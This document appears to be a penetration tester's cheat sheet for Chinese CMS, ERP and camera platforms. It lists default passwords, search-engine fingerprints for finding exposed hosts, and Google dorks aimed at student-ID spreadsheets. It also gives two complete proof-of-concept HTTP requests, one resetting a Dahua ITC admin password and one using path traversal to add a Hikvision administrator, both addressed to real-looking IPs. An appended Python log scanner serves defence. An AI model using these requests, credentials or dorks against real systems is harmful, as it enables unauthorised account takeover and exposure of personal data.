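Systems / CMS / defaults

Fingerprint queries

Main vulnerabilities

Default accounts and passwords

Default account and password: sysadmin/1

Common accounts and passwords:

Usernames: admin/system/test/test1/administrator, or search Baidu for the default username/password

Passwords: admin/123456/admin123/Admin@123/test

Google search syntax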

site:example.com ("初始密码")&("附件")
site:example.com intext:管理|后台|登陆|用户名|密码|系统|帐号|admin|login|sys|managetem|password|username
site:example.com 奖学金
site:example.com 公示附件

site:lzu.edu.cn filetype:xlsx "学号"

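RuoYi

Green RuoYi: "ruoyi" && icon_hash="706913071"

Blue RuoYi: "ruoyi" && (icon_hash="706913071" || icon_hash="-1231872293")

Shiro deserialization

Weak passwords

Yonyou NC

fofa-query: title="YONYOU NC"

If the page stays stuck in a loading state, append to the path: /portal/

时空智友 (Shikong Zhiyou)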

Fofa:

body="login.jsp?login=null"

Hunter

body="login.jsp?login=null"

Quake

body="login.jsp?login=null"

File upload

SQL injection

Kingdee K3 Cloud (金蝶云星空)

FOFA syntax: app="Kingdee-K3-cloud"

Hunter syntax: app.name="Kingdee 金蝶云星空"

Quake: favicon: "825af13371930eeb2f85cf075fa25b68"

Append directly to the path: /k3cloud

Mostly deserialization command-execution vulnerabilities

Dahua DSS

favicon: "9fa8a9035ce4baa7eee40725b5cfed16"

Mainly logic vulnerabilities

Dahua cameras

Weak passwords: admin/admin123   admin/admin12345

Dahua 智能物

Fofa: icon_hash="-1935899595"

body="*客户端会小于800*"

Logic vulnerability (password reset: enter three 1s, or 1, 2, 3, to reset the password)

JustForTest/1

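Dahua Smart Park Integrated Management Platform

FOFA query: app="dahua-智慧园区综合管理平台"

Hunter query: web.body="/WPMS/asset/lib/gridster/"

File upload

Information disclosure

Dahua DSS digital surveillance system

FOFA syntax: app="dahua-DSS" or icon_hash="2095320044"

Mainly information disclosure and Struts2 vulnerabilities

Dahua ITC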

hunter: web.body="/itc/login_init.action"

Administrator password reset vulnerability; the PoC is as follows:
POST /admin/services/AdminUserService HTTP/1.1
Host: 61.178.49.133:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Content-Length: 353
Content-Type: text/xml;charset=UTF-8
X-Requested-With: XMLhttpRequest
Accept-Encoding: gzip

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:tns="http://webservice.dhsoft.com">
   <soapenv:Header/>
   <soapenv:Body>
     <tns:modifyPassword>
        <arg0>
          {"id":"1","loginName":"system","loginPass":"password"}
        </arg0>
     </tns:modifyPassword>
   </soapenv:Body>
</soapeny:Envelope>

Spring Boot

Common directories: /actuator, /env

Nacos

Fofa: "nacos" or icon_hash="13942501"

Weak password (nacos/nacos)

Login bypass via token

Hikvision Integrated Security Platform

fofa-query: body="/portal/skin/isee/redblack/"

POST /isupm/api/..;/user/addUserWithRole HTTP/1.1
Host: 60.165.152.14:543
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
userId: admin
Content-Length: 517

{
  "groupId": "usergroup000",
  "userName": "administrator",
  "userLevel": 5,
  "pwd": "983605f69b7a3a91187eb301eda62bbde9513ea706821b3e93ccdadbfe055b88",
  "personIndexCode": null,
  "personName": "",
  "salt": "c4ca4238a0b923820dcc509a6f75849b",
  "description": "",
  "extendedAttribute": {},
  "roleIds": "4",
  "mac": "",
  "userExtInfos": [],
  "pwdLevel": 2,
  "userRegionInfo": {
    "adds": [{ "indexCode": "", "nodeType": "" }],
    "dels": [{ "indexCode": "", "nodeType": "" }]
  },
  "userExpire": ""
}

// Adds a user with the username administrator and the password "P@ssw0rd0."
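
For defenders, the requests in these notes leave recognizable request lines in web access logs. The following is an added example, not part of the original notes: a small Python scan for the "..;" path segment, the /admin/services/AdminUserService endpoint and the /actuator and /env paths. The log layout (common/combined format), the rule names and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote

# Rule names are invented for this example; the patterns come from the requests
# and paths listed in these notes.
RULES = [
    # "..;" path segment, as in /isupm/api/..;/user/addUserWithRole
    ("dotdot-semicolon-segment", re.compile(r"/\.\.;[^/]*/")),
    # SOAP endpoint used by the Dahua ITC modifyPassword request
    ("adminuserservice-soap", re.compile(r"^/admin/services/AdminUserService", re.I)),
    # Spring Boot management paths: /actuator, /actuator/..., /env
    ("actuator-or-env", re.compile(r"^/(?:actuator(?:/|$)|env$)", re.I)),
]

# Assumed log layout (common/combined): ip - - [ts] "METHOD target HTTP/x" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def scan(lines):
    """Return one dict per (log line, matching rule), in input order."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not in the assumed format
        ip, ts, method, target, status = m.groups()
        # Drop the query string and percent-decode once so %2e%2e;/ is also seen.
        path = unquote(target.split("?", 1)[0])
        for name, rx in RULES:
            if rx.search(path):
                hits.append({"rule": name, "ip": ip, "time": ts, "method": method,
                             "path": path, "status": int(status)})
    return hits

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "POST /isupm/api/..;/user/addUserWithRole HTTP/1.1" 200 57',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "POST /isupm/api/%2e%2e;/user/addUserWithRole HTTP/1.1" 200 57',
    '198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "POST /admin/services/AdminUserService HTTP/1.1" 200 310',
    '192.0.2.4 - - [01/Jan/2024:10:02:00 +0000] "GET /actuator/env HTTP/1.1" 401 0',
    '192.0.2.4 - - [01/Jan/2024:10:02:09 +0000] "GET /portal/login.jsp HTTP/1.1" 200 4120',
]

if __name__ == "__main__":
    for h in scan(SAMPLE):
        print(f'{h["time"]} {h["ip"]} {h["rule"]} {h["method"]} {h["path"]} -> {h["status"]}')
```

A 200 response on the first two rules is worth immediate follow-up: check the user table for accounts that were added or changed around the logged time.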